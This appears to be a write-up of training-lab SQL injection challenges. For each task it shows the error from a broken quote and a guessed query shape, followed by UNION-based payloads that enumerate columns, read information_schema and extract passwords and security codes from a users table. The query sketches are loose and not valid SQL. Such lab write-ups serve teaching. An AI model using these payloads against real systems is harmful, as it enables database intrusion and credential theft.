Writeup

ES 1

url : http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

SQL

id=1'

error: right syntax to use near ‘‘1’’’ at line 1

probabilistic query :

SELECT FROM table WHERE field='id'

Injection

1'OR 1 = 1-- -

Find the number of columns:

1' OR 1 = 1 ORDER BY 1,2,3 -- -

Find the injectable column:

1' OR 1 = 1 UNION SELECT 1,'hello2',3 -- -
1' UNION SELECT 'hello1',version(),3 -- -

Find the current user and the database:

1' UNION SELECT 'hello1',current_user(),3 -- -
1' UNION SELECT 'hello1',database(),3 -- -

Find the table names from the database using the information_schema :

1' UNION SELECT 'hello1',table_name,3 from information_schema.tables where table_schema=database() -- -

Find the column names of a particular table:

1' UNION SELECT 'hello1',column_name,3 from information_schema.columns where table_schema=database() and table_name='users'-- -

Print information from a table (password,sec_code):

1' UNION SELECT '1',sec_code,3 from users-- -
1' UNION SELECT 'hello1',password,3 from users-- -

ES 2

url : http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1

SQL

id=1'

error: right syntax to use near '’’ at line 1

proabilistic query:

SELECT FROM table WHERE field=id

Injection

so we need just to insert our payload without encoding it. to get all username and the first user’s password :

1 OR 1 = 1 --
1 UNION SELECT 1,password,3,4 FROM users LIMIT 1,1--

ES 3

url : http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1

SQL

id=1"

error : right syntax to use near ‘“1”"’ at line 1

probabilistic query :

SELECT FROM table WHERE field = "id"

Injection

To print the usernames :

1" OR 1 = 1 --"

enumerate columns :

1" ORDER BY 1,2,3,4,5 --"

print version :

-1" UNION SELECT 1,version(),3,4,5 -- -"

ES 4

url : http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1

SQL

id=1')

error : right syntax to use near ‘')’ at line 1

probabilistic query :

SELECT FROM table WHERE field = ('id')

Injection

find all username and print both sec_code and password of the first one (two methods) :

1') OR 1 = 1 -- -')
1') UNION SELECT 1,concat(sec_code,password),3,4 FROM users LIMIT 1,1 -- ")' --
-1') UNION SELECT 1,concat(sec_code,password),3,4 FROM users LIMIT 0,1 -- -')

Death Row Injection

The death single row injection is when the website only prints the first result and we can’t get all the array printed. The SQL query would be something like this:

Select Username from users limit 0,1;

ES 1

url : http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1

SQL

id=1'

error : right syntax to use near '’ and id=1’ limit 1’ at line 1

probabilistic query:

SELECT FROM table WHERE field=1 limit 1

Injection

Find the number of column and print the password of the user

-1 ORDER BY 1,2,3,4,5-- -
-1 UNION SELECT 1,password,3,4,5 FROM users--

ES 2

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch2.php?id=1

SQL

id=1'

error : right syntax to use near ‘')) limit 1’ at line 1

to get the same result as id=1 :

1)) OR 1 = 1 -- -

probabilistic query :

SELECT FROM table WHERE (field=(id))

Injection

to get password :

-1)) UNION SELECT 1,password FROM users -- -

to get all sec_codes/passwords :

-1)) UNION SELECT 1,group_concat(sec_code,password) FROM (SELECT sec_code,password FROM users limit 0,8)a -- -

to increase buffer up to 8192 byte (in this case 2048):

-1)) UNION SELECT 1,CAST(GROUP_CONCAT(sec_code,password) AS CHAR(2048)) FROM (SELECT sec_code,password FROM users limit 0,8)a -- -

ES 3

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1

SQL

id=1"

error: right syntax to use near '"1"" limit 1’ at line 1.

probabilistic query:

SELECT FROM users WHERE id = "id" limit 1;

injection

to find the columns number :

1" ORDER BY 1,2,3,4,5,6 --"

to print user() :

-1" UNION SELECT 1,2,3,user(),5 -- -"

ES 4

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch4.php?id=1

SQL

id=1")

error : right syntax to use near ‘")’ at line 1

probabilistic query :

SELECT FROM users WHERE id = ("id");

Injection

find injectable paramater :

-1") UNION SELECT 1,2,3,4,5,6,7-- -")

print sec_code :

-1") UNION SELECT 1,2,3,sec_code,5,6,7 FROM users-- -")